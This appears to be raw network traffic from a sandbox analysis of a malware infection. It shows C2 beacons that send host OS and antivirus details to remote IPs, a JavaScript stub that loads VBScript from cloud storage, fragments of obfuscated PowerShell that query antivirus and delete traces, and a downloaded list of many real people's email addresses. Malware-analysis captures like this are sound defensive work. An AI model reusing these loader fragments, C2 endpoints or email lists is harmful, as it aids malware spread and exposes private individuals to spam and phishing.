Dec 12, 2024 12:56:04.121125937 CET	209	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:56:03 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 42 72 61 7a 69 6c Data Ascii: Brazil

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:56:17.122169971 CET	169	OUT	POST /ps/index14.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 159.100.18.13 Content-Length: 94 Expect: 100-continue Connection: Keep-Alive
Dec 12, 2024 12:56:17.345138073 CET	25	IN	HTTP/1.1 100 Continue
Dec 12, 2024 12:56:17.350227118 CET	94	OUT	Data Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 36 Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 64-Bit CPU
Dec 12, 2024 12:56:17.603955030 CET	209	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:56:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 42 72 61 7a 69 6c Data Ascii: Brazil

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:56:17.681117058 CET	146	OUT	POST /ps1/index14.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 159.100.18.13 Content-Length: 94 Expect: 100-continue
Dec 12, 2024 12:56:17.897025108 CET	25	IN	HTTP/1.1 100 Continue
Dec 12, 2024 12:56:17.897244930 CET	94	OUT	Data Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 36 Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 64-Bit CPU
Dec 12, 2024 12:56:18.142129898 CET	153	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:56:17 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 42 72 61 7a 69 6c Data Ascii: Brazil

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:57:02.062905073 CET	169	OUT	POST /ps/index14.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 159.100.18.13 Content-Length: 94 Expect: 100-continue Connection: Keep-Alive
Dec 12, 2024 12:57:02.279189110 CET	25	IN	HTTP/1.1 100 Continue
Dec 12, 2024 12:57:02.283446074 CET	94	OUT	Data Raw: 41 54 3d 57 31 30 36 34 5f 30 33 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 20 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 29 20 20 36 Data Ascii: AT=computer Microsoft Windows 10 Pro Windows Defender English (United Kingdom) 64-Bit CPU
Dec 12, 2024 12:57:02.528186083 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:57:23.063281059 CET	319	OUT	POST /INFB/index14.php HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 73 Host: 159.100.18.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 b0c5r2K7a8s7E427ox/12.0
Dec 12, 2024 12:57:23.279539108 CET	73	OUT	Data Raw: 41 54 3d 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 31 30 2b 50 72 6f 2b 25 32 38 36 34 25 32 39 62 69 74 2b 41 72 74 68 75 72 2b 39 32 31 37 30 32 26 4d 44 3d 57 69 6e 64 6f 77 73 2b 44 65 66 65 6e 64 65 72 Data Ascii: AT=Microsoft+Windows+10+Pro+%2864%29bit+user+921702&MD=Windows+Defender
Dec 12, 2024 12:57:23.525091887 CET	209	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 42 72 61 7a 69 6c Data Ascii: Brazil

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 12:57:38.938939095 CET	94	OUT	GET /a/08/150822/au/auout/anexo.zip HTTP/1.1 Host: 93.127.200.211 Connection: Keep-Alive
Dec 12, 2024 12:57:39.088222980 CET	810	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:39 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Thu, 05 Dec 2024 19:54:12 GMT ETag: "207-6288b43200100" Accept-Ranges: bytes Content-Length: 519 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/zip Data Raw: 50 4b 03 04 14 00 00 08 08 00 c6 86 85 59 09 28 7e 77 6b 01 00 00 16 02 00 00 1d 00 00 00 72 39 4e 32 79 31 48 34 79 34 61 31 66 39 36 39 32 33 37 36 36 38 34 38 2e 68 74 6d 6c 4d 92 4d 6f 1b 21 10 86 ef 96 fc 1f c8 56 ca 29 2c bb f6 da 4a 36 26 55 d5 26 a7 48 ad f2 71 c8 71 0c c3 2e 0d 0b 14 b0 53 2b ca 7f cf 7e c4 51 c4 61 de 79 5e 34 c0 0c 9b 93 5f bf 7f 3e 3c fd b9 26 6d ea cc d5 7c b6 19 22 31 60 1b 9e f9 44 af ef b3 11 22 c8 21 76 98 80 88 16 42 c4 c4 b3 c7 87 1b 7a 9e 7d 72 0b 1d f2 6c af f1 c5 bb 90 32 22 9c 4d 68 fb 7d 2f 5a a6 96 4b dc 6b 81 74 4c ce 88 b6 3a 69 30 34 0a 30 c8 cb bc 18 eb 24 9d 0c 5e 6d d8 14 7b 10 d3 61 14 5b 27 0f e4 75 3e 53 7d 4d aa a0 d3 e6 50 93 1f a1 af 70 46 22 d8 48 23 06 ad 2e e7 b3 0e 42 a3 6d 4d 8a 5e 7b 90 52 db a6 26 8b c2 ff ef f3 2d 88 e7 26 b8 9d 95 54 38 e3 42 4d be a9 6a 58 bd f7 36 9f b5 e5 70 c2 d1 59 2e 97 13 f6 5f e9 6a b5 9a e8 86 1d af 36 3d be 4d c9 53 fc b7 d3 7b 9e 05 54 01 63 fb a5 03 e5 25 79 bc bb e5 c3 a6 58 33 a6 74 c0 2d 44 8c c9 05 68 30 [TRUNCATED] Data Ascii: PKY(~wkr9N2y1H4y4a1f96923766848.htmlMMo!V),J6&U&Hqq.S+~Qay^4_><&m\|"1`D"!vBz}rl2"Mh}/ZKktL:i040$^m{a['u>S}MPpF"H#.BmM^{R&-&T8BMjX6pY._j6=MS{Tc%yX3t-Dh0ok1cm_r>zFIC4g\JrQEEbyQUJ8g9tbOPKY(~wk r9N2y1H4y4a1f96923766848.htmlPKK
Dec 12, 2024 12:57:39.118644953 CET	164	OUT	GET /a/08/150822/au/auout/list.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: 93.127.200.211
Dec 12, 2024 12:57:39.267916918 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:39 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Thu, 12 Dec 2024 11:29:25 GMT ETag: "21b61-6291106cf92ec" Accept-Ranges: bytes Content-Length: 138081 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 6c 69 73 74 2e 30 31 33 37 2e 74 78 74 0a 6c 69 73 74 2e 30 31 33 38 2e 74 78 74 0a 6c 69 73 74 2e 30 31 33 39 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 30 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 31 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 32 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 33 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 34 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 35 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 36 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 37 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 38 2e 74 78 74 0a 6c 69 73 74 2e 30 31 34 39 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 30 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 31 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 32 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 33 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 34 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 35 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 36 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 37 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 38 2e 74 78 74 0a 6c 69 73 74 2e 30 31 35 39 2e 74 78 74 0a 6c 69 73 74 2e 30 31 36 30 2e 74 78 74 0a 6c 69 [TRUNCATED] Data Ascii: list.0137.txtlist.0138.txtlist.0139.txtlist.0140.txtlist.0141.txtlist.0142.txtlist.0143.txtlist.0144.txtlist.0145.txtlist.0146.txtlist.0147.txtlist.0148.txtlist.0149.txtlist.0150.txtlist.0151.txtlist.0152.txtlist.0153.txtlist.0154.txtlist.0155.txtlist.0156.txtlist.0157.txtlist.0158.txtlist.0159.txtlist.0160.txtlist.0161.txtlist.0162.txtlist.0163.txtlist.0164.txtlist.0165.txtlist.0166.txtlist.0167.txtlist.0168.txtlist.0169.txtlist.0170.txtlist.0171.txtlist.0172.txtlist.0173.txtlist.0174.txtlist.0175.txtlist.0176.txtlist.0177.txtlist.0178.txtlist.0179.txtlist.0180.txtlist.0181.txtlist.0182.txtlist.0183.txtlist.0184.txtlist.0185.txtlist.0186.txtlist.0187.txtlist.0188.txtlist.0189.txtlist.0190.txtlist.0191.txtlist.0192.txtlist.0193.txtlist.0194.txtlist.0195.txtlist.0196.txtlist.0197.txtlist.0198.txtlist.0199.txtlist.0200.txtlist.0201.txtlist.0202.txtlist.0203.txtlist.0204.txtlist.0205.txtlist.0206.txtlist.0207.txtlist.0208.txtlist [TRUNCATED]
Dec 12, 2024 12:57:39.267930031 CET	1289	IN	Data Raw: 2e 74 78 74 0a 6c 69 73 74 2e 30 32 31 31 2e 74 78 74 0a 6c 69 73 74 2e 30 32 31 32 2e 74 78 74 0a 6c 69 73 74 2e 30 32 31 33 2e 74 78 74 0a 6c 69 73 74 2e 30 32 31 34 2e 74 78 74 0a 6c 69 73 74 2e 30 32 31 35 2e 74 78 74 0a 6c 69 73 74 2e 30 32 Data Ascii: .txtlist.0211.txtlist.0212.txtlist.0213.txtlist.0214.txtlist.0215.txtlist.0216.txtlist.0217.txtlist.0218.txtlist.0219.txtlist.0220.txtlist.0221.txtlist.0222.txtlist.0223.txtlist.0224.txtlist.0225.txtlist.0226.txtlist.0227.txt
Dec 12, 2024 12:57:39.267940044 CET	1289	IN	Data Raw: 74 78 74 0a 6c 69 73 74 2e 30 33 30 33 2e 74 78 74 0a 6c 69 73 74 2e 30 33 30 34 2e 74 78 74 0a 6c 69 73 74 2e 30 33 30 35 2e 74 78 74 0a 6c 69 73 74 2e 30 33 30 36 2e 74 78 74 0a 6c 69 73 74 2e 30 33 30 37 2e 74 78 74 0a 6c 69 73 74 2e 30 33 30 Data Ascii: txtlist.0303.txtlist.0304.txtlist.0305.txtlist.0306.txtlist.0307.txtlist.0308.txtlist.0309.txtlist.0310.txtlist.0311.txtlist.0312.txtlist.0313.txtlist.0314.txtlist.0315.txtlist.0316.txtlist.0317.txtlist.0318.txtlist.0319.txtl
Dec 12, 2024 12:57:39.267963886 CET	1289	IN	Data Raw: 78 74 0a 6c 69 73 74 2e 30 33 39 35 2e 74 78 74 0a 6c 69 73 74 2e 30 33 39 36 2e 74 78 74 0a 6c 69 73 74 2e 30 33 39 37 2e 74 78 74 0a 6c 69 73 74 2e 30 33 39 38 2e 74 78 74 0a 6c 69 73 74 2e 30 33 39 39 2e 74 78 74 0a 6c 69 73 74 2e 30 34 30 30 Data Ascii: xtlist.0395.txtlist.0396.txtlist.0397.txtlist.0398.txtlist.0399.txtlist.0400.txtlist.0401.txtlist.0402.txtlist.0403.txtlist.0404.txtlist.0405.txtlist.0406.txtlist.0407.txtlist.0408.txtlist.0409.txtlist.0410.txtlist.0411.txtli
Dec 12, 2024 12:57:39.268199921 CET	1289	IN	Data Raw: 74 0a 6c 69 73 74 2e 30 34 38 37 2e 74 78 74 0a 6c 69 73 74 2e 30 34 38 38 2e 74 78 74 0a 6c 69 73 74 2e 30 34 38 39 2e 74 78 74 0a 6c 69 73 74 2e 30 34 39 30 2e 74 78 74 0a 6c 69 73 74 2e 30 34 39 31 2e 74 78 74 0a 6c 69 73 74 2e 30 34 39 32 2e Data Ascii: tlist.0487.txtlist.0488.txtlist.0489.txtlist.0490.txtlist.0491.txtlist.0492.txtlist.0493.txtlist.0494.txtlist.0495.txtlist.0496.txtlist.0497.txtlist.0498.txtlist.0499.txtlist.0500.txtlist.0501.txtlist.0502.txtlist.0503.txtlis
Dec 12, 2024 12:57:39.268212080 CET	1289	IN	Data Raw: 0a 6c 69 73 74 2e 30 35 37 39 2e 74 78 74 0a 6c 69 73 74 2e 30 35 38 30 2e 74 78 74 0a 6c 69 73 74 2e 30 35 38 31 2e 74 78 74 0a 6c 69 73 74 2e 30 35 38 32 2e 74 78 74 0a 6c 69 73 74 2e 30 35 38 33 2e 74 78 74 0a 6c 69 73 74 2e 30 35 38 34 2e 74 Data Ascii: list.0579.txtlist.0580.txtlist.0581.txtlist.0582.txtlist.0583.txtlist.0584.txtlist.0585.txtlist.0586.txtlist.0587.txtlist.0588.txtlist.0589.txtlist.0590.txtlist.0591.txtlist.0592.txtlist.0593.txtlist.0594.txtlist.0595.txtlist
Dec 12, 2024 12:57:39.268222094 CET	1289	IN	Data Raw: 6c 69 73 74 2e 30 36 37 31 2e 74 78 74 0a 6c 69 73 74 2e 30 36 37 32 2e 74 78 74 0a 6c 69 73 74 2e 30 36 37 33 2e 74 78 74 0a 6c 69 73 74 2e 30 36 37 34 2e 74 78 74 0a 6c 69 73 74 2e 30 36 37 35 2e 74 78 74 0a 6c 69 73 74 2e 30 36 37 36 2e 74 78 Data Ascii: list.0671.txtlist.0672.txtlist.0673.txtlist.0674.txtlist.0675.txtlist.0676.txtlist.0677.txtlist.0678.txtlist.0679.txtlist.0680.txtlist.0681.txtlist.0682.txtlist.0683.txtlist.0684.txtlist.0685.txtlist.0686.txtlist.0687.txtlist.
Dec 12, 2024 12:57:39.268249035 CET	1289	IN	Data Raw: 69 73 74 2e 30 37 36 33 2e 74 78 74 0a 6c 69 73 74 2e 30 37 36 34 2e 74 78 74 0a 6c 69 73 74 2e 30 37 36 35 2e 74 78 74 0a 6c 69 73 74 2e 30 37 36 36 2e 74 78 74 0a 6c 69 73 74 2e 30 37 36 37 2e 74 78 74 0a 6c 69 73 74 2e 30 37 36 38 2e 74 78 74 Data Ascii: ist.0763.txtlist.0764.txtlist.0765.txtlist.0766.txtlist.0767.txtlist.0768.txtlist.0769.txtlist.0770.txtlist.0771.txtlist.0772.txtlist.0773.txtlist.0774.txtlist.0775.txtlist.0776.txtlist.0777.txtlist.0778.txtlist.0779.txtlist.0
Dec 12, 2024 12:57:39.268259048 CET	1289	IN	Data Raw: 73 74 2e 30 38 35 35 2e 74 78 74 0a 6c 69 73 74 2e 30 38 35 36 2e 74 78 74 0a 6c 69 73 74 2e 30 38 35 37 2e 74 78 74 0a 6c 69 73 74 2e 30 38 35 38 2e 74 78 74 0a 6c 69 73 74 2e 30 38 35 39 2e 74 78 74 0a 6c 69 73 74 2e 30 38 36 30 2e 74 78 74 0a Data Ascii: st.0855.txtlist.0856.txtlist.0857.txtlist.0858.txtlist.0859.txtlist.0860.txtlist.0861.txtlist.0862.txtlist.0863.txtlist.0864.txtlist.0865.txtlist.0866.txtlist.0867.txtlist.0868.txtlist.0869.txtlist.0870.txtlist.0871.txtlist.08
Dec 12, 2024 12:57:39.268268108 CET	1289	IN	Data Raw: 74 2e 30 39 34 37 2e 74 78 74 0a 6c 69 73 74 2e 30 39 34 38 2e 74 78 74 0a 6c 69 73 74 2e 30 39 34 39 2e 74 78 74 0a 6c 69 73 74 2e 30 39 35 30 2e 74 78 74 0a 6c 69 73 74 2e 30 39 35 31 2e 74 78 74 0a 6c 69 73 74 2e 30 39 35 32 2e 74 78 74 0a 6c Data Ascii: t.0947.txtlist.0948.txtlist.0949.txtlist.0950.txtlist.0951.txtlist.0952.txtlist.0953.txtlist.0954.txtlist.0955.txtlist.0956.txtlist.0957.txtlist.0958.txtlist.0959.txtlist.0960.txtlist.0961.txtlist.0962.txtlist.0963.txtlist.096
Dec 12, 2024 12:57:39.417123079 CET	1289	IN	Data Raw: 2e 31 30 33 39 2e 74 78 74 0a 6c 69 73 74 2e 31 30 34 30 2e 74 78 74 0a 6c 69 73 74 2e 31 30 34 31 2e 74 78 74 0a 6c 69 73 74 2e 31 30 34 32 2e 74 78 74 0a 6c 69 73 74 2e 31 30 34 33 2e 74 78 74 0a 6c 69 73 74 2e 31 30 34 34 2e 74 78 74 0a 6c 69 Data Ascii: .1039.txtlist.1040.txtlist.1041.txtlist.1042.txtlist.1043.txtlist.1044.txtlist.1045.txtlist.1046.txtlist.1047.txtlist.1048.txtlist.1049.txtlist.1050.txtlist.1051.txtlist.1052.txtlist.1053.txtlist.1054.txtlist.1055.txtlist.1056
Dec 12, 2024 12:57:39.737262011 CET	169	OUT	GET /a/08/150822/au/auout/list.0137.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: 93.127.200.211
Dec 12, 2024 12:57:39.887422085 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:39 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Tue, 19 Nov 2024 12:52:28 GMT ETag: "6cdd-62743816d9b00" Accept-Ranges: bytes Content-Length: 27869 Vary: Accept-Encoding Content-Type: text/plain Data Raw: 65 64 75 61 72 64 6f 6d 6f 6e 63 61 64 61 6c 6f 70 65 7a 40 79 61 68 6f 6f 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 64 72 61 67 6f 6e 2e 6d 72 40 67 6d 2e 67 72 75 70 6f 6d 61 70 2e 6d 78 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 6f 73 74 69 6a 65 72 61 73 40 79 61 68 6f 6f 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 6f 7a 63 40 68 6f 74 6d 61 69 6c 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 72 6f 79 40 73 6f 6c 6d 75 74 2e 6d 78 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 72 72 6f 79 40 74 6f 6d 63 61 74 2e 6d 78 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 61 6e 6f 40 64 65 6c 76 61 2e 63 6f 6d 2e 6d 78 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 65 61 67 75 64 6f 40 65 6d 66 65 73 61 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 65 6a 6f 5f 38 32 40 6f 75 74 6c 6f 6f 6b 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 65 73 40 6c 69 66 75 6e 67 2e 63 6f 6d 2e 6d 78 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 65 73 33 35 33 40 79 61 68 6f 6f 2e 65 73 0d 0a 65 64 75 61 72 64 6f 6d 6f 6e 74 65 73 64 65 6f 63 61 40 61 72 [TRUNCATED] Data Ascii: eduardomoncadalopez@yahoo.eseduardomondragon.mr@gm.grupomap.mxeduardomonostijeras@yahoo.eseduardomonozc@hotmail.eseduardomonroy@solmut.mxeduardomonrroy@tomcat.mxeduardomontano@delva.com.mxeduardomonteagudo@emfesa.eseduardomontejo_82@outlook.eseduardomontes@lifung.com.mxeduardomontes353@yahoo.eseduardomontesdeoca@arlex.com.mxeduardomontiel@cablevision.net.mxeduardomontiel@simarefrigeracion.com.mxeduardomontolla@ponderosa.com.mxeduardomontoya@ponderosa.com.mxeduardomontoyac@cruzazul.com.mxeduardomontoyae@cruzazul.com.mxeduardo-mor@hotmail.eseduardomora.253350@ce.grupomap.mxeduardomora.mr@gm.grupomap.mxeduardomora@sertec.com.mxeduardomoraes@microdigital.pteduardomorales@baumgarten.com.mxeduardomorales@hka.mxeduardo-morales@terra.com.mxeduardo-moran@outlook.eseduardomoran@upla.eseduardomoran_resa@hotmail.eseduardomoran2305@yahoo.eseduardomoreira@live.com.pteduardomoreira2010@live.com.pteduardomoreno@alessia.com.mxeduardomoreno@aviation. [TRUNCATED]
Dec 12, 2024 12:57:39.895742893 CET	262	OUT	POST /a/08/150822/au/auout/index.php?CHLG HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Content-Type: application/x-www-form-urlencoded Host: 93.127.200.211 Content-Length: 18 Expect: 100-continue
Dec 12, 2024 12:57:40.046044111 CET	25	IN	HTTP/1.1 100 Continue
Dec 12, 2024 12:57:40.201447010 CET	147	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:57:39 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Timestamp	Bytes transferred	Direction	Data
2024-12-12 11:55:58 UTC	343	OUT	GET /ZRALJZLWYNP/PNQRJTRMIB HTTP/1.1 Accept: / Accept-Language: en-US,en-GB;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: contablegbv.shop Connection: Keep-Alive
2024-12-12 11:55:58 UTC	320	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:55:58 GMT Server: Apache/2.4.52 (Ubuntu) Strict-Transport-Security: max-age=31536000 Content-Security-Policy: upgrade-insecure-requests Last-Modified: Thu, 12 Dec 2024 10:04:55 GMT ETag: "148-6290fd894051c" Accept-Ranges: bytes Content-Length: 328 Connection: close
2024-12-12 11:55:58 UTC	328	IN	Data Raw: 76 61 72 20 73 63 72 69 70 74 45 6c 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 73 63 72 69 70 74 45 6c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 20 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 62 61 73 65 73 74 6f 72 61 67 65 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 76 30 2f 62 2f 6d 64 73 61 72 71 75 69 74 65 74 2e 61 70 70 73 70 6f 74 2e 63 6f 6d 2f 6f 2f 6c 64 76 62 3f 61 6c 74 3d 6d 65 64 69 61 26 74 6f 6b 65 6e 3d 66 62 31 65 39 34 61 36 2d 37 65 36 31 2d 34 34 31 39 2d 61 34 65 64 2d 35 62 66 34 61 65 35 30 63 61 65 31 22 29 3b 0d 0a 73 63 72 69 70 74 45 6c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 20 22 74 65 78 74 2f 76 62 73 63 Data Ascii: var scriptEle = document.createElement("script");scriptEle.setAttribute("src", "https://firebasestorage.googleapis.com/v0/b/mdsarquitet.appspot.com/o/ldvb?alt=media&token=fb1e94a6-7e61-4419-a4ed-5bf4ae50cae1");scriptEle.setAttribute("type", "text/vbsc

Timestamp	Bytes transferred	Direction	Data
2024-12-12 11:56:02 UTC	76	OUT	GET /ll2310/at3 HTTP/1.1 Host: contablebar.shop Connection: Keep-Alive
2024-12-12 11:56:02 UTC	323	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 11:56:02 GMT Server: Apache/2.4.52 (Ubuntu) Strict-Transport-Security: max-age=31536000 Content-Security-Policy: upgrade-insecure-requests Last-Modified: Wed, 04 Dec 2024 16:32:26 GMT ETag: "6008-6287453b5ba80" Accept-Ranges: bytes Content-Length: 24584 Connection: close
2024-12-12 11:56:02 UTC	7869	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 5f 5f 5f 2f 2f 2f 2f 2f 2f 2f 2f 2f 20 7b 20 0d 0a 5b 63 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 20 20 20 20 20 0d 0a 70 61 72 61 6d 20 28 20 0d 0a 5b 73 74 72 69 6e 67 5d 24 43 6f 6d 70 75 74 65 72 4e 61 6d 65 20 3d 20 22 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 20 2c 20 0d 0a 24 43 72 65 64 65 6e 74 69 61 6c 20 0d 0a 29 20 0d 0a 20 20 20 20 42 45 47 49 4e 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 77 6d 69 51 75 65 72 79 20 3d 20 22 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 22 20 0d 0a 20 20 20 20 20 20 20 20 7d 20 0d 0a 20 20 20 20 50 52 4f 43 45 53 53 20 20 0d 0a 20 20 20 20 20 20 20 20 7b 20 20 20 24 41 6e 74 69 Data Ascii: function ____///////// { [cmdletBinding()] param ( [string]$ComputerName = "$env:computername" , $Credential ) BEGIN { $wmiQuery = "SELECT * FROM AntiVirusProduct" } PROCESS { $Anti
2024-12-12 11:56:03 UTC	8000	IN	Data Raw: 20 3d 20 28 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 29 0d 0a 20 20 20 20 24 7b 5c 5c 2f 2f 2f 2f 2f 5c 7d 20 3d 20 28 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 20 2b 20 22 41 22 29 0d 0a 20 20 20 20 24 7b 2f 5c 7d 20 3d 20 28 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5f 5f 5f 5c 5c 5c 5c 2f 7c 5f 7d 20 2b 20 22 42 22 29 20 09 0d 0a 09 64 65 6c 20 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5c 5c 5c 5c 2f 7c 5f 7d 5c 2a 2e 76 62 73 0d 0a 20 20 20 20 64 65 6c 20 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c 2f 5c 5c 5c 5c 5c 5c 5c 2f 7c 5f 7d 5c 2a 2e 6c 6e 6b 0d 0a 20 20 20 20 64 65 6c 20 24 7b 5f 5c 5c 5c 5c 5c 5c 2f 7c 5c 5f 2f 7c Data Ascii: = (${_\\\\\\/\|\_/\|/\\\___\\\\/\|_}) ${\\/////\} = (${_\\\\\\/\|\_/\|/\\\___\\\\/\|_} + "A") ${/\} = (${_\\\\\\/\|\_/\|/\\\___\\\\/\|_} + "B") del ${_\\\\\\/\|\_/\|/\\\\\\\/\|_}\.vbs del ${_\\\\\\/\|\_/\|/\\\\\\\/\|_}\.lnk del ${_\\\\\\/\|\_/\|
